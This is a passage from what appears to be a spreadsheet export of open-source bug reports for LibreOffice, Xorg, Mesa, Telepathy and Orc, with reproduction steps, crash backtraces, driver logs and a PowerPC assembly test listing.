Steps to reproduce:
1. Start Libre Office Draw.
2 Check that you use  centimeters or millimeters length units (Tools -&gt; Options -&gt; LibreOffice Draw -&gt; General -&gt; Unit of measurement).
3 Draw a rectangle with sizes less than 10 mm.
4 Select the rectangle
5 Open Â«Position and sizeÂ» dialogue (Format -&gt; Position and size)
Current behavior:
Width and Height fields show 1.00cm (or 10.00mm)
Expected behavior:
The fields should contain correct sizes of the object.
If you copy the object into LibreOffice Writer document and open Â«Position and sizeÂ» dialogue there it shows correct sizes.
I met the problem in LibreOffice 4.2beta2 and 4.2.0.1 on Debian testing (â€œJessieâ€) in VirtualBox. LibreOffice 4.1.2.3 from Debian 7 (â€œWheezyâ€) backports and 4.1.3.2 on Windows7 work without the problem.
I attach a test document with a small rectangle and a sceenshot with incorrect width and height. 
Operating System: Debian
Version: 4.2.0.1 rc
Last worked in: 4.1.3.2 release</t>
  </si>
  <si>
    <t>TELEPATHY-41743</t>
  </si>
  <si>
    <t>Receiving an offline message from a contact before the roster arrives makes them show up as 'unknown' not 'offline'</t>
  </si>
  <si>
    <t>Bug 38603 strikes again! This time here are the steps:
â€¢ have amy@foo.com on your roster
â€¢ sign out
â€¢ get amy to message you
â€¢ sign in
â€¢ receive the offline message from amy
â€¢ receive the roster.
We would expect that when we get the roster everyone on it with subscription='to' or 'both' for whom we haven't seen presence will be announced as 'offline'. But receiving a message before the roster arrives seems to break this and amy will erroneously show up as 'unknown'.</t>
  </si>
  <si>
    <t>XORG-37815</t>
  </si>
  <si>
    <t>Xorg crash when plug/unplug external VGA cable during video playback.</t>
  </si>
  <si>
    <t>Created attachment 47423
xorg log 
Environment:
X server: 1.9.0
kernel:   2.6.37
OS: MeeGo 1.2ã€€ï¼ˆhttp://repo.meego.com/MeeGo/releases/1.2.0/images/meego-netbook-ia32/ï¼‰
HW: HP mini 210
2D Driver:  intel 
Reproduce stepsï¼š
1. plug VGA cable
2. play a youtube video in chromium brower
3. unplug VGA cable
4  plug VGA cable.
reproduce step 3-4 about 1- 5 cycles. xserver will crash.
Backtrace:
[  8103.184] 0: /usr/bin/Xorg (xorg_backtrace+0x3c) [0x80a5ffc]
[  8103.185] 1: /usr/bin/Xorg (0x8047000+0x61976) [0x80a8976]
[  8103.185] 2: (vdso) (__kernel_rt_sigreturn+0x0) [0xb784640c]
[  8103.185] 3: /usr/lib/xorg/modules/drivers/intel_drv.so (0xb775e000+0x1fcbb) [0xb777dcbb]
[  8103.185] 4: /usr/lib/xorg/modules/extensions/libdri2.so (DRI2CopyRegion+0x97) [0xb779bb57]
[  8103.185] 5: /usr/lib/xorg/modules/extensions/libdri2.so (0xb779a000+0x3d9f) [0xb779dd9f]
[  8103.185] 6: /usr/bin/Xorg (0x8047000+0x49a37) [0x8090a37]
[  8103.185] 7: /usr/bin/Xorg (0x8047000+0x1bb8a) [0x8062b8a]
[  8103.186] 8: /lib/libc.so.6 (__libc_start_main+0xe7) [0x4a52abb7]
[  8103.186] 9: /usr/bin/Xorg (0x8047000+0x1b7a1) [0x80627a1]
[  8103.186] Segmentation fault at address 0x40
[  8103.186] 
Fatal server error:
[  8103.186] Caught signal 11 (Segmentation fault). Server aborting
[  8103.186] 
[  8103.186]</t>
  </si>
  <si>
    <t>ting.z.zhou</t>
  </si>
  <si>
    <t>MEDIA-PLAYER-INFO-27054</t>
  </si>
  <si>
    <t>add amazon kindle 2</t>
  </si>
  <si>
    <t>Created attachment 34013
obvious patch
The Amazon Kindle 2 has the product ID 0002 and is otherwise the same as the Kindle 1.</t>
  </si>
  <si>
    <t>MESA-36914</t>
  </si>
  <si>
    <t>r600g: add rv670 flushing workaround. Causes games and some mesa demos to segfault.</t>
  </si>
  <si>
    <t>RV670 AGP card with agpmode=-1 d-r-t kernel as it was 16/03/11
Since
5066f7cd0e010db46b42f8f08a33c10cb34f8726
r600g: add rv670 flushing workaround.
I am getting segfaults with openarena nexuiz etqw and a few mesa demos - 
gltestperfclearspd and ipers.
The bt of the segfault seems to repeat for ever.
Starting program: /home/andy/Src/Mesa-git/demos/src/demos/ipers 
[Thread debugging using libthread_db enabled]
IperS V1.0
Written by David Bucciarelli (tech.hmw@plus.it)
[New Thread 0xb726f700 (LWP 14143)]
Program received signal SIGSEGV Segmentation fault.
[Switching to Thread 0xb726f700 (LWP 14143)]
r600_context_flush (ctx=0x8074e10) at r600_hw_context.c:1282
1282    {
(gdb) bt
#0  r600_context_flush (ctx=0x8074e10) at r600_hw_context.c:1282
#1  0xb6eeed3b in r600_context_flush_all (ctx=0x8074e10 flush_flags=128) at r600_hw_context.c:786
#2  0xb6eeef18 in r600_context_bo_flush (ctx=0x8074e10 flush_flags=33554496 flush_mask=0 rbo=0x83c1488) at r600_hw_context.c:814
#3  0xb6eef030 in r600_context_flush_dest_caches (ctx=0x8074e10) at r600_hw_context.c:1197
#4  0xb6eee833 in r600_context_flush (ctx=0x8074e10) at r600_hw_context.c:1298
#5  0xb6eeed3b in r600_context_flush_all (ctx=0x8074e10 flush_flags=128) at r600_hw_context.c:786
#6  0xb6eeef18 in r600_context_bo_flush (ctx=0x8074e10 flush_flags=33554496 flush_mask=0 rbo=0x83c1488) at r600_hw_context.c:814
#7  0xb6eef030 in r600_context_flush_dest_caches (ctx=0x8074e10) at r600_hw_context.c:1197
#8  0xb6eee833 in r600_context_flush (ctx=0x8074e10) at r600_hw_context.c:1298
#9  0xb6eeed3b in r600_context_flush_all (ctx=0x8074e10 flush_flags=128) at r600_hw_context.c:786
#10 0xb6eeef18 in r600_context_bo_flush (ctx=0x8074e10 flush_flags=33554496 flush_mask=0 rbo=0x83c1488) at r600_hw_context.c:814
#11 0xb6eef030 in r600_context_flush_dest_caches (ctx=0x8074e10) at r600_hw_context.c:1197
#12 0xb6eee833 in r600_context_flush (ctx=0x8074e10) at r600_hw_context.c:1298</t>
  </si>
  <si>
    <t>XORG-21825</t>
  </si>
  <si>
    <t>x86emu: VIA CN896: 00 ILLEGAL EXTENDED X86 OPCODE</t>
  </si>
  <si>
    <t>Apparently I'm having trouble with int10.  I'm running xorg-1.6.11 on
FreeBSD-7.2 using xorg-7.4.
        Driver      openchrome
        VendorName  VIA Technologies Inc.
        BoardName   CN896/VN896/P4M900 [Chrome 9 HC]
This works fine with the via driver in xorg-6.9 which is now
obsolete.  It sort of works with xorg-7.2 with the vesa driver but
insists on 1024x768 when the real resolution is 1280x768.  With
xorg-7.4 I get:
0000:f8da: 00 ILLEGAL EXTENDED X86 OPCODE!
See http://localweb.orleans.occnc.com/via-xorg-7.4-woes/
for Xorg.0.log and xorg.conf files and a stack trace.</t>
  </si>
  <si>
    <t>curtis</t>
  </si>
  <si>
    <t>LIBREOFFICE-87292</t>
  </si>
  <si>
    <t>path to the file with the Cyrillic alphabet is percent-encoded</t>
  </si>
  <si>
    <t>Created attachment 110825
screenshot of message
LO 4.3.5.2 (locale ru_RU) Writer Windows 7 x86_64.
ID build: 3a87456aaa6a95c63eea1c1b3201acedf0751bd5
Menu Insert-Image-From file select image bottom dialog activate Link option push Open. Message appears to confirm the insertion of link. Then look at the screenshot - path to the file with the Cyrillic alphabet looks set of characters.</t>
  </si>
  <si>
    <t>XORG-10250</t>
  </si>
  <si>
    <t>BadMatch when running gnome-terminal with the murrine-0.51 gtk engine</t>
  </si>
  <si>
    <t>gnome-terminal crashes right away when started with --sync without that it crashes after I maximize the window or after the last line in the terminal window is reached (dmesg cat [large file] etc will cause that).
My libX11 is compiled with the xcb backend but cairo apparently uses xlib (even though I enabled the 'xcb' USE flag).
When I run gnome-terminal --sync without gdb xcb prints this after the normal libX11 error report this however doesn't happen when I run it in gdb:
gnome-terminal: xcb_xlib.c:41: xcb_xlib_lock: Assertion `!c-&gt;xlib.lock' failed.
When I downgrade to murrine-0.41 it doesn't crash. Also so far gnome-terminal is the only app that crashes.
X Window System Version 1.2.99.901 (1.3.0 RC 1)
Here is the backtrace:
[Thread debugging using libthread_db enabled]
[New Thread 47946178530160 (LWP 13563)]
[New Thread 1082140992 (LWP 13573)]
Gdk-ERROR **: The program 'gnome-terminal' received an X Window System error.
This probably reflects a bug in the program.
The error was 'BadMatch (invalid parameter attributes)'.
  (Details: serial 1199 error_code 8 request_code 72 minor_code 0)
  (Note to programmers: normally X errors are reported asynchronously
   that is you will receive the error a while after causing it.
   To debug your program run it with the --sync command line
   option to change this behavior. You can then get a meaningful
   backtrace from your debugger if you break on the gdk_x_error() function.)
aborting...
Program received signal SIGTRAP Trace/breakpoint trap.
[Switching to Thread 47946178530160 (LWP 13563)]
0x00002b9b557ee5d3 in IA__g_logv (log_domain=0x2b9b527104ba Gdk log_level=G_LOG_LEVEL_ERROR format=0x2b9b5271082e %s args1=0x7fff5a8efee0) at gmessages.c:493
(gdb) bt
#0  0x00002b9b557ee5d3 in IA__g_logv (log_domain=0x2b9b527104ba Gdk log_level=G_LOG_LEVEL_ERROR format=0x2b9b5271082e %s args1=0x7fff5a8efee0) at gmessages.c:493
#1  0x00002b9b557ee71b in IA__g_log (log_domain=0x2b9b527104ba Gdk log_level=G_LOG_LEVEL_ERROR format=0x2b9b5271082e %s) at gmessages.c:517
#2  0x00002b9b526d438e in gdk_x_error (display=0x567210 error=0x7fff5a8f0090) at gdkmain-x11.c:635
#3  0x00002b9b54ef1925 in _XError (dpy=0x567210 rep=0x6d5ef0) at XlibInt.c:2905
#4  0x00002b9b54efab2f in handle_event (dpy=0x567210 e=0x6d5ef0) at xcb_io.c:86
#5  0x00002b9b54efad8d in process_responses (dpy=0x567210 wait_for_first_event=0 current_error=0x7fff5a8f0228 current_request=1200) at xcb_io.c:142
#6  0x00002b9b54efb716 in _XReply (dpy=0x567210 rep=0x7fff5a8f0280 extra=0 discard=1) at xcb_io.c:371
#7  0x00002b9b54ee9e4f in XSync (dpy=0x567210 discard=0) at Sync.c:48
#8  0x00002b9b54ee9f32 in _XSyncFunction (dpy=0x2b9b55b9b960) at Synchro.c:37
#9  0x00002b9b54edf66c in XPutImage (dpy=0x567210 d=31457397 gc=0x6d4870 image=0x7fff5a8f0480 req_xoffset=0 req_yoffset=0 x=0 y=0 req_width=657 req_height=23) at PutImage.c:1032
#10 0x00002b9b52bbbf18 in _draw_image_surface (surface=0x7435a0 image=0x69f7f0 src_x=0 src_y=0 width=657 height=23 dst_x=0 dst_y=0) at cairo-xlib-surface.c:781
#11 0x00002b9b52bbc08f in _cairo_xlib_surface_release_dest_image (abstract_surface=0x7435a0 interest_rect=0x7fff5a8f0658 image=0x69f7f0 image_rect=0x7fff5a8f0668 image_extra=0x0)
    at cairo-xlib-surface.c:847
#12 0x00002b9b52b90272 in _cairo_surface_release_dest_image (surface=0x7435a0 interest_rect=0x7fff5a8f0658 image=0x69f7f0 image_rect=0x7fff5a8f0668 image_extra=0x0) at cairo-surface.c:953
#13 0x00002b9b52b92091 in _fallback_fini (state=0x7fff5a8f0650) at cairo-surface-fallback.c:96
#14 0x00002b9b52b93ea2 in _cairo_surface_fallback_composite (op=CAIRO_OPERATOR_OVER src=0x7fff5a8f0af0 mask=0x0 dst=0x7435a0 src_x=0 src_y=0 mask_x=0 mask_y=0 dst_x=0 dst_y=0 width=657 height=23)
    at cairo-surface-fallback.c:1040
#15 0x00002b9b52b90660 in _cairo_surface_composite (op=CAIRO_OPERATOR_OVER src=0x7fff5a8f0af0 mask=0x0 dst=0x7435a0 src_x=0 src_y=0 mask_x=0 mask_y=0 dst_x=0 dst_y=0 width=657 height=23)
    at cairo-surface.c:1096
#16 0x00002b9b52b92c5b in _composite_trap_region (clip=0x743490 src=0x7fff5a8f0af0 op=CAIRO_OPERATOR_OVER dst=0x7435a0 trap_region=0x6d59a0 extents=0x7fff5a8f09c0) at cairo-surface-fallback.c:444
#17 0x00002b9b52b931a4 in _clip_and_composite_trapezoids (src=0x7fff5a8f0af0 op=CAIRO_OPERATOR_OVER dst=0x7435a0 traps=0x7fff5a8f0a60 clip=0x743490 antialias=CAIRO_ANTIALIAS_DEFAULT)
    at cairo-surface-fallback.c:628
#18 0x00002b9b52b93788 in _cairo_surface_fallback_fill (surface=0x7435a0 op=CAIRO_OPERATOR_OVER source=0x7fff5a8f0af0 path=0x73e708 fill_rule=CAIRO_FILL_RULE_WINDING tolerance=0.10000000000000001 
    antialias=CAIRO_ANTIALIAS_DEFAULT) at cairo-surface-fallback.c:836
#19 0x00002b9b52b90f75 in _cairo_surface_fill (surface=0x7435a0 op=CAIRO_OPERATOR_OVER source=0x7fff5a8f0be0 path=0x73e708 fill_rule=CAIRO_FILL_RULE_WINDING tolerance=0.10000000000000001 
    antialias=CAIRO_ANTIALIAS_DEFAULT) at cairo-surface.c:1368
#20 0x00002b9b52b8088c in _cairo_gstate_fill (gstate=0x7433f0 path=0x73e708) at cairo-gstate.c:994
#21 0x00002b9b52b77ce8 in *INT_cairo_fill_preserve (cr=0x73e6e0) at cairo.c:2052
#22 0x00002b9b52b77cb1 in cairo_fill (cr=0x73e6e0) at cairo.c:2030
#23 0x00002aaaab07d633 in murrine_draw_menubar (cr=0x73e6e0 colors=0x753038 widget=0x7fff5a8f10e0 x=0 y=0 width=657 height=23 menubarstyle=1) at ./src/murrine_draw.c:660
#24 0x00002aaaab072724 in murrine_style_draw_box (style=0x752c60 window=0x677280 state_type=GTK_STATE_NORMAL shadow_type=GTK_SHADOW_OUT area=0x7fff5a8f2034 widget=0x5865b0 
    detail=0x2b9b523ac5f3 menubar x=0 y=0 width=657 height=23) at ./src/murrine_style.c:390
#25 0x00002b9b52213f30 in IA__gtk_paint_box (style=0x752c60 window=0x677280 state_type=GTK_STATE_NORMAL shadow_type=GTK_SHADOW_OUT area=0x7fff5a8f2034 widget=0x5865b0 detail=0x2b9b523ac5f3 menubar 
    x=0 y=0 width=657 height=23) at gtkstyle.c:5880
#26 0x00002b9b5217df60 in gtk_menu_bar_paint (widget=0x5865b0 area=0x7fff5a8f2034) at gtkmenubar.c:519
#27 0x00002b9b5217e06a in gtk_menu_bar_expose (widget=0x5865b0 event=0x7fff5a8f2020) at gtkmenubar.c:539
#28 0x00002b9b5216d2e5 in _gtk_marshal_BOOLEAN__BOXED (closure=0x5d1150 return_value=0x7fff5a8f1900 n_param_values=2 param_values=0x7fff5a8f1be0 invocation_hint=0x7fff5a8f1930 
    marshal_data=0x2b9b5217df6b) at gtkmarshalers.c:84
#29 0x00002b9b55469f65 in g_type_class_meta_marshal (closure=0x5d1150 return_value=0x7fff5a8f1900 n_param_values=2 param_values=0x7fff5a8f1be0 invocation_hint=0x7fff5a8f1930 marshal_data=0x188)
    at gclosure.c:567
#30 0x00002b9b55469c55 in IA__g_closure_invoke (closure=0x5d1150 return_value=0x7fff5a8f1900 n_param_values=2 param_values=0x7fff5a8f1be0 invocation_hint=0x7fff5a8f1930) at gclosure.c:490
#31 0x00002b9b554833f4 in signal_emit_unlocked_R (node=0x5d13f0 detail=0 instance=0x5865b0 emission_return=0x7fff5a8f1bc0 instance_and_params=0x7fff5a8f1be0) at gsignal.c:2478
#32 0x00002b9b55481e41 in IA__g_signal_emit_valist (instance=0x5865b0 signal_id=57 detail=0 var_args=0x7fff5a8f1e50) at gsignal.c:2209
#33 0x00002b9b5548238e in IA__g_signal_emit (instance=0x5865b0 signal_id=57 detail=0) at gsignal.c:2243
#34 0x00002b9b522e1a04 in gtk_widget_event_internal (widget=0x5865b0 event=0x7fff5a8f2020) at gtkwidget.c:3915
#35 0x00002b9b522e1693 in IA__gtk_widget_send_expose (widget=0x5865b0 event=0x7fff5a8f2020) at gtkwidget.c:3752
#36 0x00002b9b5216a0ad in IA__gtk_main_do_event (event=0x7fff5a8f2020) at gtkmain.c:1527
#37 0x00002b9b526a6e8e in gdk_window_process_updates_internal (window=0x677280) at gdkwindow.c:2333
#38 0x00002b9b526a6fae in IA__gdk_window_process_all_updates () at gdkwindow.c:2396
#39 0x00002b9b520b0ca9 in gtk_container_idle_sizer (data=0x0) at gtkcontainer.c:1113
#40 0x00002b9b557e8038 in g_idle_dispatch (source=0x6c0d50 callback=0x2b9b520b0c0a  user_data=0x0) at gmain.c:3928
#41 0x00002b9b557e4029 in g_main_dispatch (context=0x582790) at gmain.c:2045
#42 0x00002b9b557e5785 in IA__g_main_context_dispatch (context=0x582790) at gmain.c:2596
#43 0x00002b9b557e5dca in g_main_context_iterate (context=0x582790 block=1 dispatch=1 self=0x584d80) at gmain.c:2677
#44 0x00002b9b557e65d4 in IA__g_main_loop_run (loop=0x5833f0) at gmain.c:2881
#45 0x00002b9b521697f0 in IA__gtk_main () at gtkmain.c:1148
#46 0x000000000041a800 in ?? ()
#47 0x00002b9b55982374 in __libc_start_main () from /lib/libc.so.6
#48 0x0000000000410889 in ?? ()
#49 0x00007fff5a8f2738 in ?? ()
#50 0x0000000000000000 in ?? ()
(gdb)</t>
  </si>
  <si>
    <t>LIBREOFFICE-44792</t>
  </si>
  <si>
    <t>LOCALHELP missing for the new Calc functions: SEC CSC SECH CSCH</t>
  </si>
  <si>
    <t>Using LibreOffice 3.5.0b2 (Ubuntu 11.10 64 bit) 
with offline help installed - there is no help for the SEC CSC SECH CSCH functions.
These functions do not exist either in
http://help.libreoffice.org/Calc/Mathematical_Functions</t>
  </si>
  <si>
    <t>lml</t>
  </si>
  <si>
    <t>LIBREOFFICE-62218</t>
  </si>
  <si>
    <t>regression LO 3.6.x &amp; 4.0.12 canÂ´t open LO 3.5.7 documents with charts/error bars correctly</t>
  </si>
  <si>
    <t>Created attachment 76382
Libreoffice 3.5.7 document
Documents cearted with LO 3.5.7 can not opend with LO &gt; 3.5.7. The Charts with errer bars are not shown correcly and I think the error bar values will be lost.
Steps to reproduce:
open attached *.odt with Libreoffice 3.5.7
--&gt; everthink is OK
open attached *.odt with Libreoffice 3.6 or 4.0
--&gt; error bars have the wrong value
--&gt; if error bars donÂ´t have the wrong value doubleclick on it and error bar values will be lost when you get in the chart menu</t>
  </si>
  <si>
    <t>dittrich.m</t>
  </si>
  <si>
    <t>ORC-44067</t>
  </si>
  <si>
    <t>exec_opcodes_sys test fails on PowerPC G4: cmplef param</t>
  </si>
  <si>
    <t>With orc git as of today (0.10.16.1) this is the only test that fails for me on a powerbook G4 debian sid system:
dest array 0 bad
 0  0:   0.00038158 -&gt;            0            0
 1  0:  -8.7709e+21 -&gt; nan ffffffff nan ffffffff
 2  0:  -1.6656e+19 -&gt; nan ffffffff nan ffffffff
 3  0:  -4.3011e-21 -&gt; nan ffffffff nan ffffffff
 4  0:   1.1526e-11 -&gt;            0            0
 5  0:   2.3518e+05 -&gt;            0            0
 6  0:   3.5837e-23 -&gt;            0            0
 7  0:  -2.3427e+10 -&gt; nan ffffffff nan ffffffff
 8  0:  -1.9398e+23 -&gt; nan ffffffff nan ffffffff
 9  0:   3.3276e-11 -&gt;            0            0
10  0:  -3.4311e-20 -&gt; nan ffffffff nan ffffffff
11  0:  -7.1094e+21 -&gt; nan ffffffff nan ffffffff
12  0:  -1.3017e-20 -&gt; nan ffffffff nan ffffffff
13  0:  -3.8253e-40 -&gt; nan ffffffff            0 *
14  0:   2.3946e-33 -&gt;            0            0
15  0:   8.3737e-20 -&gt;            0            0
16  0:   4.1724e+10 -&gt;            0            0
17  0:  -1.0295e+25 -&gt; nan ffffffff nan ffffffff
18  0:   -1.996e-07 -&gt; nan ffffffff nan ffffffff
19  0:  -4.6762e-29 -&gt; nan ffffffff nan ffffffff
20  0:   -0.0013861 -&gt; nan ffffffff nan ffffffff
21  0:  -6.0649e+12 -&gt; nan ffffffff nan ffffffff
22  0:  -0.00040297 -&gt; nan ffffffff nan ffffffff
23  0:   3.0699e-38 -&gt;            0            0
24  0:   1.4091e+12 -&gt;            0            0
25  0:   3.8796e+27 -&gt;            0            0
26  0:  -1.5947e+32 -&gt; nan ffffffff nan ffffffff
27  0:  -1.3526e+37 -&gt; nan ffffffff nan ffffffff
28  0:   1.4705e+14 -&gt;            0            0
29  0:  -9.5631e-20 -&gt; nan ffffffff nan ffffffff
30  0:   7.5269e-38 -&gt;            0            0
31  0:  -8.6358e+08 -&gt; nan ffffffff nan ffffffff
32  0:      -367.44 -&gt; nan ffffffff nan ffffffff
33  0:   2.5415e-27 -&gt;            0            0
34  0:   0.00012921 -&gt;            0            0
35  0:  -8.0721e-39 -&gt; nan ffffffff            0 *
36  0:   3.6688e+09 -&gt;            0            0
37  0:   2.1476e-06 -&gt;            0            0
38  0:  -0.00016253 -&gt; nan ffffffff nan ffffffff
39  0:  -2.5088e+19 -&gt; nan ffffffff nan ffffffff
40  0:   1.6636e+34 -&gt;            0            0
41  0:   1.5452e-08 -&gt;            0            0
42  0:   6.9117e+16 -&gt;            0            0
43  0:   2.0673e+31 -&gt;            0            0
44  0:   1.1363e+35 -&gt;            0            0
45  0:  -7.1533e+30 -&gt; nan ffffffff nan ffffffff
46  0:  -0.00043762 -&gt; nan ffffffff nan ffffffff
47  0:  -1.8759e-32 -&gt; nan ffffffff nan ffffffff
48  0:   2.3347e+08 -&gt;            0            0
49  0:   3.2632e-18 -&gt;            0            0
50  0:   6.7812e-10 -&gt;            0            0
51  0:   9.0154e-12 -&gt;            0            0
52  0:  -2.8367e-11 -&gt; nan ffffffff nan ffffffff
53  0:   2.8172e-12 -&gt;            0            0
54  0:  -3.4413e+16 -&gt; nan ffffffff nan ffffffff
55  0:   2.8895e-14 -&gt;            0            0
56  0:   1.4482e-24 -&gt;            0            0
57  0:    0.0041076 -&gt;            0            0
58  0:  -6.5828e-28 -&gt; nan ffffffff nan ffffffff
59  0:   2.4135e-34 -&gt;            0            0
60  0:      -714.45 -&gt; nan ffffffff nan ffffffff
61  0:    0.0029027 -&gt;            0            0
62  0:  -4.1055e+30 -&gt; nan ffffffff nan ffffffff
63  0:   5.8106e-27 -&gt;            0            0
64  0:  -3.7651e-10 -&gt; nan ffffffff nan ffffffff
65  0:  -5.2028e+13 -&gt; nan ffffffff nan ffffffff
66  0:    3.866e+14 -&gt;            0            0
67  0:   2.8801e+14 -&gt;            0            0
68  0:   -1.065e-26 -&gt; nan ffffffff nan ffffffff
69  0:   2.9739e+33 -&gt;            0            0
70  0:  -1.3471e+17 -&gt; nan ffffffff nan ffffffff
71  0:  -3.8801e-19 -&gt; nan ffffffff nan ffffffff
72  0:  -1.2218e+28 -&gt; nan ffffffff nan ffffffff
73  0:   5.8126e+05 -&gt;            0            0
74  0:   3.6338e+15 -&gt;            0            0
75  0:    3.821e+33 -&gt;            0            0
76  0:  -4.2008e+33 -&gt; nan ffffffff nan ffffffff
.global test_p_cmplef
test_p_cmplef:
  stwu r1 -16(r1)
  vspltish v0 1
  mtvscr v0
  lwz r5 20(r3)
  lwz r6 36(r3)
0:
  lwz r0 4(r3)
  srawi. r0 r0 0
  ble- 2f
  mtctr r0
1:
# 0: loadl
  lvewx v2 0 r6
  lvsl v3 0 r6
  vperm v2 v2 v2 v3
# 1: loadpl
  addi r4 r3 372
  lvewx v1 0 r4
  lvsl v0 0 r4
  vperm v1 v1 v1 v0
  vspltw v1 v1 0
# 2: cmplef
  vcmpgtfp v2 v1 v2
# 3: storel
  lvsr v3 0 r5
  vperm v4 v2 v2 v3
  stvewx v4 0 r5
  addi r5 r5 4
  addi r6 r6 4
  bdnz+ 1b
2:
  vspltisw v0 0
  mtvscr v0
  addi r1 r1 16
  blr
test failed
FAIL: cmplef param (this last line is from orc-bugreport)</t>
  </si>
  <si>
    <t>POLICYKIT-23611</t>
  </si>
  <si>
    <t>build system improvements / cleanups</t>
  </si>
  <si>
    <t>Attached are a few build system improvements.</t>
  </si>
  <si>
    <t>LIBREOFFICE-83354</t>
  </si>
  <si>
    <t>REPORTBUILDER: Chart is truncated - moved down outside the margins of the object</t>
  </si>
  <si>
    <t>From version 4.3.0 et 4.3.1 the graphs in the report (reportbuilder) are poorly positioned and truncated ???
The same graphs in the report are proprely viewed in version 4.2.5.
Can you tell me if a correction is?
Thank you in advance for your response.
Operating System: Windows XP
Version: 4.3.0.4 release
Last worked in: 4.2.5.2 release</t>
  </si>
  <si>
    <t>christian.carrouge</t>
  </si>
  <si>
    <t>LIBREOFFICE-71729</t>
  </si>
  <si>
    <t>UI: Manage Names dialog populates Name box but not Range box for the first range before any is selected</t>
  </si>
  <si>
    <t>Steps to reproduce:
1. Open a spreadsheet with any number of named ranges.
2. Click Insert &gt; Names &gt; Manage to display the Manage Names dialog.
Current behavior:
In the list pane (the top part of the dialog) there is a list of the named ranges.  The first one is highlighted.  In the middle part of the dialog there are fields for Name Range and Scope.  The Name and Scope fields in this middle part are populated with the information for the first named range.  The Range field is blank.  You need to focus on the first range either with a mouse click or by pressing the down arrow for the Range field to populate with the information for the first range.
Expected behavior:
When the Manage Names dialog first displays before the user has clicked on a range or begun to scroll through the list of ranges with the arrow keys all of the fields in the middle part of the Manage Names dialog (Name Range and Scope) should be populated with the correct information for the first range.
This pertains to 67621 and takes the place of 68608.</t>
  </si>
  <si>
    <t>douglasnaphas</t>
  </si>
  <si>
    <t>XORG-15792</t>
  </si>
  <si>
    <t>nv04 (TNT2) video blitter problem.</t>
  </si>
  <si>
    <t>Created attachment 16304
xorg log
Hw:
01:00.0 VGA compatible controller: nVidia Corporation NV5 [RIVA TNT2/TNT2 Pro] (rev 15) (prog-if 00 [VGA])
        Subsystem: ASUSTeK Computer Inc. AGP-V3800PRO
        Flags: bus master 66MHz medium devsel latency 64 IRQ 19
        Memory at de000000 (32-bit non-prefetchable) [size=16M]
        Memory at da000000 (32-bit prefetchable) [size=32M]
        Expansion ROM at dfef0000 [disabled] [size=64K]
        Capabilities: [60] Power Management version 1
        Capabilities: [44] AGP version 2.0
[1043:4000]
software:
kernel 2.6.24.5
glibc-2.7
gcc-4.2.2
X server - git 3b8d53452cd6c74d32d7759964a7cd9ee775f161
xf86-video-nouveau - 85536023ed7050632d121299ab99382e096b9984
drm - 3ac74f3208ed15a990a0a26742fbfe566f08aa80
Screen resolution 1024x768 24bpp. Option Randr12 1. (important). Composite extension enabled in xorg.conf composite manager disabled.
Trying to watch movie in fullscreen resulted in blue rectangle and following errors in dmesg [playing 3 frames in mplayer]: 
[drm] Initialized drm 1.1.0 20060810
ACPI: PCI Interrupt 0000:01:00.0[A] -&gt; GSI 16 (level low) -&gt; IRQ 19
[drm] Detected an NV4 generation card (0x20154000)
[drm] Initialized nouveau 0.0.10 drm-2.3.0-1227-g3ac74f3208ed15a99 on minor 0
agpgart: Found an AGP 2.0 compliant device at 0000:00:00.0.
agpgart: Putting AGP V2 device at 0000:00:00.0 into 4x mode
agpgart: Putting AGP V2 device at 0000:01:00.0 into 4x mode
[drm] Allocating FIFO number 0
[drm] nouveau_fifo_alloc: initialised FIFO 0
[drm] Allocating FIFO number 1
[drm] nouveau_fifo_alloc: initialised FIFO 1
[drm] NV: PGRAPH context switch interrupt channel 0 -&gt; 1
eth0: no IPv6 routers present
[drm] PGRAPH_NOTIFY - nSource: DATA_ERROR nStatus: BAD_ARGUMENT
[drm] PGRAPH_NOTIFY - Ch 1/6 Class 0x0042 Mthd 0x0304 Data 0xc03f4380:0x15a815a8
[drm] PGRAPH_NOTIFY - nSource: DATA_ERROR nStatus: BAD_ARGUMENT
[drm] PGRAPH_NOTIFY - Ch 1/6 Class 0x0042 Mthd 0x0308 Data 0xc03f4380:0xfe2bb038
[drm] PGRAPH_NOTIFY - nSource: DATA_ERROR nStatus: BAD_ARGUMENT
[drm] PGRAPH_NOTIFY - Ch 1/6 Class 0x0042 Mthd 0x030c Data 0xc03f4380:0xfe2bb038
[drm] PGRAPH_NOTIFY - nSource: STATE_INVALID nStatus: INVALID_STATE BAD_ARGUMENT
[drm] PGRAPH_NOTIFY - Ch 1/2 Class 0x0077 Mthd 0x040c Data 0xc03f4380:0x00000000
[drm] PGRAPH_NOTIFY - nSource: DATA_ERROR nStatus: INVALID_STATE BAD_ARGUMENT
[drm] PGRAPH_NOTIFY - Ch 1/6 Class 0x0042 Mthd 0x0304 Data 0xd09467d1:0x15a815a8
[drm] PGRAPH_NOTIFY - nSource: DATA_ERROR nStatus: INVALID_STATE BAD_ARGUMENT
[drm] PGRAPH_NOTIFY - Ch 1/6 Class 0x0042 Mthd 0x0308 Data 0xd09467d1:0xfe2bb038
[drm] PGRAPH_NOTIFY - nSource: DATA_ERROR nStatus: INVALID_STATE BAD_ARGUMENT
[drm] PGRAPH_NOTIFY - Ch 1/6 Class 0x0042 Mthd 0x030c Data 0xd09467d1:0xfe2bb038
[drm] PGRAPH_NOTIFY - nSource: STATE_INVALID nStatus: INVALID_STATE BAD_ARGUMENT
[drm] PGRAPH_NOTIFY - Ch 1/2 Class 0x0077 Mthd 0x040c Data 0xd09467d1:0x00000000
[drm] PGRAPH_NOTIFY - nSource: DATA_ERROR nStatus: INVALID_STATE BAD_ARGUMENT
[drm] PGRAPH_NOTIFY - Ch 1/6 Class 0x0042 Mthd 0x0304 Data 0xd09467d1:0x15a815a8
[drm] PGRAPH_NOTIFY - nSource: DATA_ERROR nStatus: INVALID_STATE BAD_ARGUMENT
[drm] PGRAPH_NOTIFY - Ch 1/6 Class 0x0042 Mthd 0x0308 Data 0xd09467d1:0xfe2bb038
[drm] PGRAPH_NOTIFY - nSource: DATA_ERROR nStatus: INVALID_STATE BAD_ARGUMENT
[drm] PGRAPH_NOTIFY - Ch 1/6 Class 0x0042 Mthd 0x030c Data 0xd09467d1:0xfe2bb038
[drm] PGRAPH_NOTIFY - nSource: STATE_INVALID nStatus: INVALID_STATE BAD_ARGUMENT
[drm] PGRAPH_NOTIFY - Ch 1/2 Class 0x0077 Mthd 0x040c Data 0xd09467d1:0x00000000
Workarounds:
1) Using xrandr and lowering resolution to 832 x 624 at runtime for example.
2) add Virtual 1024x768 line in xorg.conf
3) Disable randr12 (X will start with 1024x768 framebuffer)</t>
  </si>
  <si>
